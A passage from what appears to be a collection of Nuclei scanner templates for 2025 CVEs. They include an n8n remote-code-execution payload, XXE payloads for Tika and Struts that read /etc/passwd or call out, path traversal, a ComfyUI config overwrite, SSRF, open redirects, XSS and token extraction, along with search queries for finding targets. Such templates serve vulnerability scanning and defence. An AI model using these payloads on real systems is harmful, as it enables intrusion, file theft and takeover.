Trigger\",\"type\":\"n8n-nodes-base.manualTrigger\",\"typeVersion\":1,\"position\":[250,300],\"id\":\"trigger-{{randstr}}\"},{\"parameters\":{\"values\":{\"string\":[{\"name\":\"rce_result\",\"value\":\"={{ (function() { var require = this.process.mainModule.require; var execSync = require('child_process').execSync; return execSync('whoami && id && uname -a').toString(); })() }}\"}]}},\"name\":\"RCE Test\",\"type\":\"n8n-nodes-base.set\",\"typeVersion\":2,\"position\":[450,300],\"id\":\"set-{{randstr}}\"}],\"connections\":{\"Manual Trigger\":{\"main\":[[{\"node\":\"RCE Test\",\"type\":\"main\",\"index\":0}]]}},\"settings\":{}}}\n\n    extractors:\n      - type: regex\n        name: execution_id\n        part: body\n        internal: true\n        regex:\n          - '\"executionId\":\"([0-9]+)\"'\n        group: 1\n\n    matchers:\n      - type: status\n        status:\n          - 200\n        internal: true\n\n  - id: get-results\n    raw:\n      - |\n        GET /rest/executions/{{execution_id}}?{{wait_for(3)}} HTTP/1.1\n        Host: {{Hostname}}\n\n    extractors:\n      - type: regex\n        name: rce_output\n        part: body\n        regex:\n          - '\"([^\"]*uid=[0-9]+\\([^)]+\\)[^\"]*)\"'\n        group: 1\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - 'uid=[0-9]+\\([a-zA-Z0-9_-]+\\)'\n\n      - type: status\n        status:\n          - 200\n\n  - id: delete-workflow\n    raw:\n      - |\n        POST /rest/workflows/{{workflow_id}}/archive?{{wait_for(2)}} HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {}\n\n      - |\n        DELETE /rest/workflows/{{workflow_id}}?{{wait_for(2)}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: status\n        status:\n          - 200\n        internal: true\n# digest: 4b0a00483046022100e847de5114ac7bcd66a331e39e03b43d88b1767cd4925e07fa8137f04e33c91f022100ed7fb1d8da12b23793b5a7e1d55fa11fd6d4be0c3565e5ef72f0dad5783a7349:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-68613.yaml","vuln_id":"cve-2025-68613"},{"raw":"id: CVE-2025-68602\n\ninfo:\n  name: Accept Donations with PayPal <= 1.5.2 - Open Redirect\n  author: Shivam Kamboj\n  severity: medium\n  description: |\n    The Accept Donations with PayPal & Stripe plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 1.5.2. This is due to insufficient validation on the redirect url supplied. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.\n  impact: |\n    Attackers can redirect users to malicious sites, facilitating phishing attacks and credential theft.\n  remediation: |\n    Update to the latest version beyond 1.5.1.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-paypal-donation/accept-donations-with-paypal-152-unauthenticated-open-redirect\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-68602\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N\n    cvss-score: 4.7\n    cve-id: CVE-2025-68602\n    epss-score: 0.0049\n    epss-percentile: 0.41259\n    cwe-id: CWE-601\n  metadata:\n    verified: true\n    max-request: 1\n  tags: cve,cve2025,wordpress,wp,wp-plugin,redirect,easy-paypal-donation,unauth\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/?wpedon-stripe-checkout-redirect=1&sk=nucleitest&ai=nucleitest&si=nucleitest&rf=//oast.pro\"\n\n    matchers-condition: and\n    matchers:\n      - type: status\n        status:\n          - 200\n\n      - type: word\n        part: body\n        words:\n          - 'src=\"https://js.stripe.com/v3/\"'\n\n      - type: word\n        part: body\n        words:\n          - \"let rf = '//oast.pro\"\n\n      - type: word\n        part: body\n        words:\n          - \"window.location.href = rf;\"\n\n    extractors:\n      - type: regex\n        name: open-redirect\n        part: body\n        regex:\n          - \"let rf = '([^']+)'\"\n# digest: 4b0a00483046022100e027bdbb2d26f2ac43f3fc6c679f3d4ca90b47255dc38b02546f061d92c0e8530221008c4ee37275d679f79f2f29cae269f15f949e023a38cf025a900bdb85b40aab69:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2025/CVE-2025-68602.yaml","vuln_id":"cve-2025-68602"},{"raw":"id: CVE-2025-6851\n\ninfo:\n  name: WordPress Broken Link Notifier < 1.3.1 - Unauthenticated SSRF\n  author: iamnoooob,pdresearch\n  severity: high\n  description: |\n    The Broken Link Notifier plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.3.0 via the ajax_blinks() function which ultimately calls the check_url_status_code() function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.\n  impact: |\n    An attacker can exploit this vulnerability to perform server-side request forgery attacks, potentially accessing internal services, reading local files, or conducting port scanning from the server's perspective.\n  remediation: |\n    Update the Broken Link Notifier plugin to version 1.3.1 or later which fixes this vulnerability. If immediate update is not possible, consider temporarily disabling the plugin until the fix can be applied.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-6851\n    - https://wpscan.com/vulnerability/CVE-2025-6851\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/broken-link-notifier/broken-link-notifier-130-unauthenticated-server-side-request-forgery\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2025-6851\n    cwe-id: CWE-918\n    epss-score: 0.00648\n    epss-percentile: 0.49647\n    cpe: cpe:2.3:a:broken_link_notifier_project:broken_link_notifier:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: broken_link_notifier_project\n    product: broken_link_notifier\n    publicwww-query: \"/wp-content/plugins/broken-link-notifier/\"\n    fofa-query: body=\"blnotifier_front_end\"\n  tags: cve,cve2025,wp-plugin,wordpress,ssrf,oast,unauth,wpscan,broken-link-notifier,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/\"\n    redirects: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - contains(body, 'blnotifier_front_end')\n        internal: true\n\n    extractors:\n      - type: regex\n        part: body\n        internal: true\n        name: nonce\n        group: 1\n        regex:\n          - 'blnotifier_front_end.*\"nonce\":\"(.*?)\"'\n\n  - raw:\n      - |-\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        X-Requested-With: xmlhttprequest\n        Content-Type: application/x-www-form-urlencoded\n\n        action=blnotifier_blinks&nonce={{nonce}}&source_url=http://test&header_links[]=http://{{interactsh-url}}&\n\n    matchers:\n      - type: dsl\n        dsl:\n          - contains(interactsh_protocol, 'dns')\n          - contains_all(body, 'notify', 'timing', 'Results were generated in')\n          - status_code == 200\n        condition: and\n# digest: 4a0a004730450220413897d212925941ce763152a0304a864466126214aaccf55fe967ab6902f701022100fa65496cd52ff66e4421279ac90c08953645d2d6bc656d4eed46b5ff2c87080b:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2025/CVE-2025-6851.yaml","vuln_id":"cve-2025-6851"},{"raw":"id: CVE-2025-68509\n\ninfo:\n  name: User Submitted Posts <= 20251121 - Unauthenticated Open Redirect\n  author: Shivam Kamboj\n  severity: medium\n  description: |\n    The User Submitted Posts plugin for WordPress is vulnerable to Open Redirect in all versions up to and including 20251121. This is due to insufficient validation on the redirect-override POST parameter. Unauthenticated attackers can redirect users to potentially malicious sites by tricking them into submitting a form.\n  impact: |\n    Attackers can redirect users to malicious sites, facilitating phishing attacks and credential theft.\n  remediation:\n    Update to the latest version.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-submitted-posts/user-submitted-posts-20251121-unauthenticated-open-redirect\n    - https://plugins.trac.wordpress.org/changeset?old_path=/user-submitted-posts/tags/20251121&new_path=/user-submitted-posts/tags/20251210\n  metadata:\n    verified: true\n    max-request: 2\n    fofa-query: body=\"usp-nonce\"\n  tags: cve,cve2025,wordpress,wp-plugin,user-submitted-posts,open-redirect,wp\n\nvariables:\n  content: \"{{to_lower(rand_text_alphanumeric(6))}}\"\n  username: \"{{rand_text_alphanumeric(12)}}\"\n  email: \"{{username}}@{{to_lower(rand_text_alphanumeric(6))}}.com\"\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}\"\n\n    matchers:\n      - type: word\n        words:\n          - 'name=\"usp-nonce\"'\n        internal: true\n\n    extractors:\n      - type: regex\n        name: nonce\n        part: body\n        internal: true\n        regex:\n          - 'name=\"usp-nonce\"\\s+value=\"([^\"]+)\"'\n        group: 1\n\n  - method: POST\n    path:\n      - \"{{BaseURL}}\"\n    headers:\n      Content-Type: application/x-www-form-urlencoded\n    body: \"usp-nonce={{nonce}}&user-submitted-title={{rand_int(10000,99999)}}&user-submitted-content={{content}}&user-submitted-name={{username}}&user-submitted-email={{email}}&user-submitted-url=https://test.com&user-submitted-tags=test&user-submitted-category[]=1&user-submitted-captcha=2&redirect-override=https://oast.live/\"\n\n    redirects: false\n\n    matchers:\n      - type: regex\n        part: header\n        regex:\n          - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.live\\/?(\\/|[^.].*)?$'\n# digest: 490a0046304402204722a4bde44481a5fe3fdc1956ffae7809ba9a27bcd68c0a762f44197de500e8022030b24380c659812537791d4177f39a55d5c16426e0d8246ffa98408f739c98c8:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2025/CVE-2025-68509.yaml","vuln_id":"cve-2025-68509"},{"raw":"id: CVE-2025-68493\n\ninfo:\n  name: Apache Struts XWork - XML External Entity Injection\n  author: pussycat0x\n  severity: high\n  description: |\n    Apache Struts 2.0.0 < 2.2.1 and 2.2.1 <= versions <= 6.1.0 contain an XML external entity injection caused by missing XML validation, letting attackers potentially disclose files or cause denial of service, exploit requires crafted XML input\n  impact: |\n    Attackers can disclose sensitive files or cause denial of service by exploiting XML processing.\n  remediation: |\n    Upgrade to version 6.1.1.\n  reference:\n    - https://cwiki.apache.org/confluence/display/WW/S2-069\n    - https://github.com/hsltz/CVE-2025-68493\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H\n    cvss-score: 8.1\n    cve-id: CVE-2025-68493\n    cwe-id: CWE-611\n    epss-score: 0.4334\n    epss-percentile: 0.98671\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: apache\n    product: struts\n    shodan-query:\n      - http.html:\"Apache Struts\"\n      - http.html:\"struts problem report\"\n      - http.title:\"Struts2 Showcase\"\n    fofa-query:\n      - body=\"struts problem report\"\n      - app=\"apache_struts\"\n      - title=\"Struts2 Showcase\"\n    google-query: intitle:\"struts2 showcase\"\n  tags: cve,cve2025,apache,struts,struts2,xxe,oast,oob,vkev\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - 'Struts'\n        case-insensitive: true\n        internal: true\n\n  - raw:\n      - |\n        POST /struts2-xml-parser/xmlParserNoDtdParse HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\n        Connection: close\n\n        <?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://{{interactsh-url}}\">]><foo>&xxe;</foo>\n\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"dns\"\n          - \"http\"\n        condition: or\n# digest: 490a0046304402200c9aa072654efb468acf6144c1f2b66c89169d143e6bdd13bdeb743c3148d675022042836ddbd3d406138fef4cba3784852f6a978b8a74254760202e34328f7374ad:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2025/CVE-2025-68493.yaml","vuln_id":"cve-2025-68493"},{"raw":"id: CVE-2025-68043\n\ninfo:\n  name: LottieFiles WordPress Plugin <= 3.0.0 - Missing Authorization\n  author: pussycat0x\n  severity: high\n  description: |\n    LottieFiles LottieFiles <= 3.0.0 contains a broken access control vulnerability caused by incorrectly configured access control security levels, letting attackers exploit missing authorization, exploit requires no special privileges.\n  impact: |\n    Attackers can bypass authorization to access or modify restricted resources, potentially leading to data exposure or unauthorized actions.\n  remediation: |\n    Update to the latest version beyond 3.0.0.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lottiefiles/lottiefiles-300-missing-authorization\n    - https://patchstack.com/database/Wordpress/Plugin/lottiefiles/vulnerability/wordpress-lottiefiles-plugin-3-0-0-broken-access-control-vulnerability?_s_id=cve\n    - https://plugins.svn.wordpress.org/lottiefiles/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\n    cvss-score: 7.3\n    cwe-id: CWE-862\n    cve-id: CVE-2025-68043\n    epss-score: 0.00588\n    epss-percentile: 0.46804\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: lottiefiles\n    product: lottiefiles\n    framework: wordpress\n  tags: cve,cve2025,wordpress,wp-plugin,lottiefiles,vkev\n\nhttp:\n  - raw:\n      - |\n        GET /wp-json/lottiefiles/v1/settings/ HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/json\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"is_block_logged_in\"\n\n      - type: word\n        part: header\n        words:\n          - \"application/json\"\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        part: body\n        group: 1\n        regex:\n          - '\"token\"\\s*:\\s*\"([^\"]+)\"'\n          - '\"apiKey\"\\s*:\\s*\"([^\"]+)\"'\n          - '\"accessToken\"\\s*:\\s*\"([^\"]+)\"'\n# digest: 490a0046304402200a159019ee0ef4a24b61e75eeae557cb180e41fdf82d780e3a1ca37a6a566d96022053444ef0bf2047a5d209c0f9cffe68b9eeb04f4bc269d44c04aa4e7660983492:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2025/CVE-2025-68043.yaml","vuln_id":"cve-2025-68043"},{"raw":"id: CVE-2025-67303\n\ninfo:\n  name: ComfyUI-Manager < 3.38 - Configuration Overwrite\n  author: maciejklimek\n  severity: critical\n  description: |\n    ComfyUI-Manager < 3.38 contains an insecure file storage vulnerability caused by storing files in an insufficiently protected location accessible via the web interface, letting remote attackers manipulate configuration and critical data, exploit requires web access.\n  impact: |\n    Remote attackers can manipulate configuration and critical data, potentially compromising application integrity and security.\n  remediation: |\n    Update to version 3.38 or later.\n  reference:\n    - https://github.com/Comfy-Org/ComfyUI-Manager/blob/main/docs/en/v3.38-userdata-security-migration.md\n    - https://github.com/vulhub/vulhub/blob/master/comfyui/CVE-2025-67303/README.md\n    - https://github.com/Comfy-Org/ComfyUI-Manager/blob/main/docs/en/v3.38-userdata-security-migration.md\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2025-67303\n    epss-score: 0.01412\n    epss-percentile: 0.71524\n    cwe-id: CWE-420\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: comfy-org\n    product: comfyui-manager\n    shodan-query: http.title:\"ComfyUI\"\n  tags: cve,cve2025,comfyui,comfyui-manager,intrusive,vuln,vkev\n\nhttp:\n  - raw:\n      - |\n        GET /userdata/ComfyUI-Manager%2Fconfig.ini HTTP/1.1\n        Host: {{Hostname}}\n\n      - |\n        POST /userdata/ComfyUI-Manager%2Fconfig.ini HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/octet-stream\n\n        [default]\n        security_level = weak\n\n      - |\n        GET /userdata/ComfyUI-Manager%2Fconfig.ini HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"contains_all(body_1, '[default]', 'security_level')\"\n          - \"contains(body_3, 'security_level = weak')\"\n          - \"status_code_1 == 200 && status_code_3 == 200\"\n        condition: and\n# digest: 490a0046304402204e5e739a8a875f778954196a1b86f10db86e775b71ac1c1e30ac46268e5cca3902203eb117345ec5d062013df0e0edb543e3de8750401e1a83e815ac861391721ab7:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-67303.yaml","vuln_id":"cve-2025-67303"},{"raw":"id: CVE-2025-66744\n\ninfo:\n  name: Yonyou YonBIP - Path Traversal\n  author: DhiyaneshDk\n  severity: high\n  description: |\n    Yonyou YonBIP v3 and before contains a path traversal caused by improper validation in the LoginWithV8 interface of the series data application service system, letting unauthorized attackers access sensitive information.\n  impact: |\n    Unauthorized attackers can access sensitive system information, potentially leading to data exposure.\n  remediation: |\n    Update to the latest version beyond v3.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-66744\n    - https://github.com/iSee857/YonYouBip-path-travel\n  classification:\n    cve-id: CVE-2025-66744\n    epss-score: 0.01567\n    epss-percentile: 0.7423\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n  metadata:\n    max-request: 1\n    verified: true\n    fofa-query: body=\"YonBIP | 数据应用服务\"\n  tags: cve,cve2025,yonbip,lfi,vkev\n\nhttp:\n  - raw:\n      - |\n        GET /bi/api/Portal/LoginWithV8/?ticket=/../../../../Windows/win.ini HTTP/1.1\n        Host: {{Hostname}}\n        Accept-Encoding: gzip\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"[fonts]\"\n          - \"[extensions]\"\n          - \"Message\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100ebd9f93a073e32c0793cba166f3d9fb6a353732d67981a4b9762b505a651c7bc022100905e1fe9d1f7dbf17abfc2bb86b4da0a86d15bdd09fcb95d40e7cd3043804889:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2025/CVE-2025-66744.yaml","vuln_id":"cve-2025-66744"},{"raw":"id: CVE-2025-66516\n\ninfo:\n  name: Apache Tika - XML External Entity Injection\n  author: MathematicianGoat\n  severity: high\n  description: |\n    Apache Tika tika-core (1.13-3.2.1), tika-pdf-module (2.0.0-3.2.1), and tika-parsers (1.13-1.28.5) contain an XML External Entity injection caused by processing crafted XFA files inside PDFs, letting attackers perform XXE attacks remotely, exploit requires crafted PDF input.\n  impact: |\n    Attackers can exploit XXE to read local files or cause denial of service, potentially exposing sensitive information or disrupting service.\n  remediation: |\n    Upgrade tika-core to \\u003E= 3.2.2 and ensure tika-pdf-module and tika-parsers are updated to latest versions.\n  reference:\n    - https://github.com/chasingimpact/CVE-2025-66516-Writeup-POC\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-66516\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n    cvss-score: 9.8\n    cve-id: CVE-2025-66516\n    epss-score: 0.87688\n    epss-percentile: 0.99752\n    cwe-id: CWE-611\n  metadata:\n    max-request: 2\n    verified: true\n    shodan-query: title:\"Apache Tika\"\n    fofa-query: title=\"Apache Tika\"\n  tags: cve,cve2025,apache,tika,xxe,pdf,lfr,vuln\n\nvariables:\n  passwd_payload: \"JVBERi0xLjcKJeLjz9MKMSAwIG9iago8PCAvVHlwZSAvQ2F0YWxvZyAvUGFnZXMgMiAwIFIgL0Fjcm9Gb3JtIDUgMCBSID4+CmVuZG9iagoyIDAgb2JqCjw8IC9UeXBlIC9QYWdlcyAvS2lkcyBbMyAwIFJdIC9Db3VudCAxID4+CmVuZG9iagozIDAgb2JqCjw8IC9UeXBlIC9QYWdlIC9QYXJlbnQgMiAwIFIgL01lZGlhQm94IFswIDAgNjEyIDc5Ml0gL0NvbnRlbnRzIDQgMCBSID4+CmVuZG9iago0IDAgb2JqCjw8IC9MZW5ndGggMCA+PgpzdHJlYW0KZW5kc3RyZWFtCmVuZG9iago1IDAgb2JqCjw8IC9GaWVsZHMgW10gL1hGQSA2IDAgUiAvTmVlZEFwcGVhcmFuY2VzIHRydWUgPj4KZW5kb2JqCjYgMCBvYmoKPDwgL0xlbmd0aCA3NTggPj4Kc3RyZWFtCjw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IlVURi04Ij8+CjwhRE9DVFlQRSB4ZHA6eGRwIFsKICA8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiPgpdPgo8eGRwOnhkcCB4bWxuczp4ZHA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGRwLyIgeG1sOmxhbmc9ImVuIj4KPGNvbmZpZyB4bWxucz0iaHR0cDovL3d3dy54ZmEub3JnL3NjaGVtYS94Y2kvMy4xLyI+CiAgPHByZXNlbnQ+PHBkZj48dmVyc2lvbj4xLjc8L3ZlcnNpb24+PC9wZGY+PC9wcmVzZW50Pgo8L2NvbmZpZz4KPHRlbXBsYXRlIHhtbG5zPSJodHRwOi8vd3d3LnhmYS5vcmcvc2NoZW1hL3hmYS10ZW1wbGF0ZS8zLjMvIj4KICA8c3ViZm9ybSBuYW1lPSJmb3JtMSIgbGF5b3V0PSJ0YiI+CiAgICA8cGFnZVNldD48cGFnZUFyZWE+PGNvbnRlbnRBcmVhLz48bWVkaXVtIHN0b2NrPSJsZXR0ZXIiLz48L3BhZ2VBcmVhPjwvcGFnZVNldD4KICAgIDxzdWJmb3JtPgogICAgICA8ZmllbGQgbmFtZT0iZGF0YSI+PHVpPjx0ZXh0RWRpdC8+PC91aT48dmFsdWU+PHRleHQ+Jnh4ZTs8L3RleHQ+PC92YWx1ZT48L2ZpZWxkPgogICAgPC9zdWJmb3JtPgogIDwvc3ViZm9ybT4KPC90ZW1wbGF0ZT4KPHhmYTpkYXRhc2V0cyB4bWxuczp4ZmE9Imh0dHA6Ly93d3cueGZhLm9yZy9zY2hlbWEveGZhLWRhdGEvMS4wLyI+CiAgPHhmYTpkYXRhPjxmb3JtMT48ZGF0YT4meHhlOzwvZGF0YT48L2Zvcm0xPjwveGZhOmRhdGE+CjwveGZhOmRhdGFzZXRzPgo8L3hkcDp4ZHA+CmVuZHN0cmVhbQplbmRvYmoKeHJlZgowIDcKMDAwMDAwMDAwMCA2NTUzNSBmIAowMDAwMDAwMDE2IDAwMDAwIG4gCjAwMDAwMDAwODIgMDAwMDAgbiAKMDAwMDAwMDE1MiAwMDAwMCBuIAowMDAwMDAwMjYyIDAwMDAwIG4gCjAwMDAwMDAzMjMgMDAwMDAgbiAKMDAwMDAwMDM5OSAwMDAwMCBuIAp0cmFpbGVyCjw8IC9TaXplIDcgL1Jvb3QgMSAwIFIgPj4Kc3RhcnR4cmVmCjEyOTUKJSVFT0YK\"\n  canary_payload: \"JVBERi0xLjcKJeLjz9MKMSAwIG9iago8PCAvVHlwZSAvQ2F0YWxvZyAvUGFnZXMgMiAwIFIgL0Fjcm9Gb3JtIDUgMCBSID4+CmVuZG9iagoyIDAgb2JqCjw8IC9UeXBlIC9QYWdlcyAvS2lkcyBbMyAwIFJdIC9Db3VudCAxID4+CmVuZG9iagozIDAgb2JqCjw8IC9UeXBlIC9QYWdlIC9QYXJlbnQgMiAwIFIgL01lZGlhQm94IFswIDAgNjEyIDc5Ml0gL0NvbnRlbnRzIDQgMCBSID4+CmVuZG9iago0IDAgb2JqCjw8IC9MZW5ndGggMCA+PgpzdHJlYW0KZW5kc3RyZWFtCmVuZG9iago1IDAgb2JqCjw8IC9GaWVsZHMgW10gL1hGQSA2IDAgUiAvTmVlZEFwcGVhcmFuY2VzIHRydWUgPj4KZW5kb2JqCjYgMCBvYmoKPDwgL0xlbmd0aCA3NzggPj4Kc3RyZWFtCjw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IlVURi04Ij8+CjwhRE9DVFlQRSB4ZHA6eGRwIFsKICA8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL3RtcC94eGVfdGVzdF9ub25leGlzdGVudF8xMjM0NSI+Cl0+Cjx4ZHA6eGRwIHhtbG5zOnhkcD0iaHR0cDovL25zLmFkb2JlLmNvbS94ZHAvIiB4bWw6bGFuZz0iZW4iPgo8Y29uZmlnIHhtbG5zPSJodHRwOi8vd3d3LnhmYS5vcmcvc2NoZW1hL3hjaS8zLjEvIj4KICA8cHJlc2VudD48cGRmPjx2ZXJzaW9uPjEuNzwvdmVyc2lvbj48L3BkZj48L3ByZXNlbnQ+CjwvY29uZmlnPgo8dGVtcGxhdGUgeG1sbnM9Imh0dHA6Ly93d3cueGZhLm9yZy9zY2hlbWEveGZhLXRlbXBsYXRlLzMuMy8iPgogIDxzdWJmb3JtIG5hbWU9ImZvcm0xIiBsYXlvdXQ9InRiIj4KICAgIDxwYWdlU2V0PjxwYWdlQXJlYT48Y29udGVudEFyZWEvPjxtZWRpdW0gc3RvY2s9ImxldHRlciIvPjwvcGFnZUFyZWE+PC9wYWdlU2V0PgogICAgPHN1YmZvcm0+CiAgICAgIDxmaWVsZCBuYW1lPSJkYXRhIj48dWk+PHRleHRFZGl0Lz48L3VpPjx2YWx1ZT48dGV4dD4meHhlOzwvdGV4dD48L3ZhbHVlPjwvZmllbGQ+CiAgICA8L3N1YmZvcm0+CiAgPC9zdWJmb3JtPgo8L3RlbXBsYXRlPgo8eGZhOmRhdGFzZXRzIHhtbG5zOnhmYT0iaHR0cDovL3d3dy54ZmEub3JnL3NjaGVtYS94ZmEtZGF0YS8xLjAvIj4KICA8eGZhOmRhdGE+PGZvcm0xPjxkYXRhPiZ4eGU7PC9kYXRhPjwvZm9ybTE+PC94ZmE6ZGF0YT4KPC94ZmE6ZGF0YXNldHM+CjwveGRwOnhkcD4KZW5kc3RyZWFtCmVuZG9iagp4cmVmCjAgNwowMDAwMDAwMDAwIDY1NTM1IGYgCjAwMDAwMDAwMTYgMDAwMDAgbiAKMDAwMDAwMDA4MiAwMDAwMCBuIAowMDAwMDAwMTUyIDAwMDAwIG4gCjAwMDAwMDAyNjIgMDAwMDAgbiAKMDAwMDAwMDMyMyAwMDAwMCBuIAowMDAwMDAwMzk5IDAwMDAwIG4gCnRyYWlsZXIKPDwgL1NpemUgNyAvUm9vdCAxIDAgUiA+PgpzdGFydHhyZWYKMTMxNQolJUVPRgo=\"\n\nhttp:\n  - raw:\n      - |\n        PUT /tika HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/pdf\n\n        {{base64_decode(passwd_payload)}}\n\n      - |\n        PUT /tika HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/pdf\n\n        {{base64_decode(canary_payload)}}\n\n    stop-at-first-match: true\n\n    matchers-condition: or\n    matchers:\n      - type: regex\n        part: body_1\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: dsl\n        dsl:\n          - 'status_code_2 == 200'\n          - 'contains_any(body_2, \"FileNotFoundException\", \"No such file\")'\n        condition: and\n\n    extractors:\n      - type: regex\n        part: body_1\n        group: 1\n        regex:\n          - 'data:\\s*(root:x:0:0:[^\\n]+)'\n# digest: 490a00463044022045d7e05332135fea05fc542beaf584ca789b83a22601d00fb950e0c627870e4602206507e5c0193ea5088b4368a98bf8610ad1b4e9e86fecb396b89057a564d82ad3:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2025/CVE-2025-66516.yaml","vuln_id":"cve-2025-66516"},{"raw":"id: CVE-2025-66472\n\ninfo:\n  name: XWiki DeleteApplication - Cross-Site Scripting\n  author: ritikchaddha\n  severity: medium\n  description: |\n    XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Versions 6.2-milestone-1 through 16.10.9 and 17.0.0-rc-1 through 17.4.1 of both XWiki Platform Flamingo Skin Resources and XWiki Platform Web Templates are vulnerable to a reflected XSS attack through a deletion confirmation message. The attacker-supplied script is executed when the victim clicks the \"No\" button. This issue is fixed in versions 16.10.10 and 17.4.2 of both XWiki Platform Flamingo Skin Resources and XWiki Platform Web Templates.\n  impact: |\n    An attacker can execute arbitrary JavaScript in the victim's browser, leading to potential session hijacking, data theft, or further attacks.\n  remediation: |\n    Upgrade to XWiki 14.10.14, 15.5.1, 15.8-rc-1 or above. Do not interact with suspiciously crafted links.\n  reference:\n    - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-7vpr-jm38-wr7w\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-66472\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n    cvss-score: 6.1\n    cve-id: CVE-2025-66472\n    epss-score: 0.00507\n    epss-percentile: 0.42329\n    cwe-id: CWE-80\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: xwiki\n    product: xwiki\n    shodan-query: html:\"data-xwiki-reference\"\n    fofa-query: body=\"data-xwiki-reference\"\n  tags: cve,cve2025,xwiki,xss,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/bin/view/AppWithinMinutes/DeleteApplication?appName=Help.Applications.Contributors&resolve=true&xredirect=%2fbin%2fview%2fHelp%2fApplications%2fContributors%2f'%3balert(document.domain)%2f%2f\"\n      - \"{{BaseURL}}/xwiki/bin/view/AppWithinMinutes/DeleteApplication?appName=Help.Applications.Contributors&resolve=true&xredirect=%2fbin%2fview%2fHelp%2fApplications%2fContributors%2f'%3balert(document.domain)%2f%2f\"\n\n    stop-at-first-match: true\n    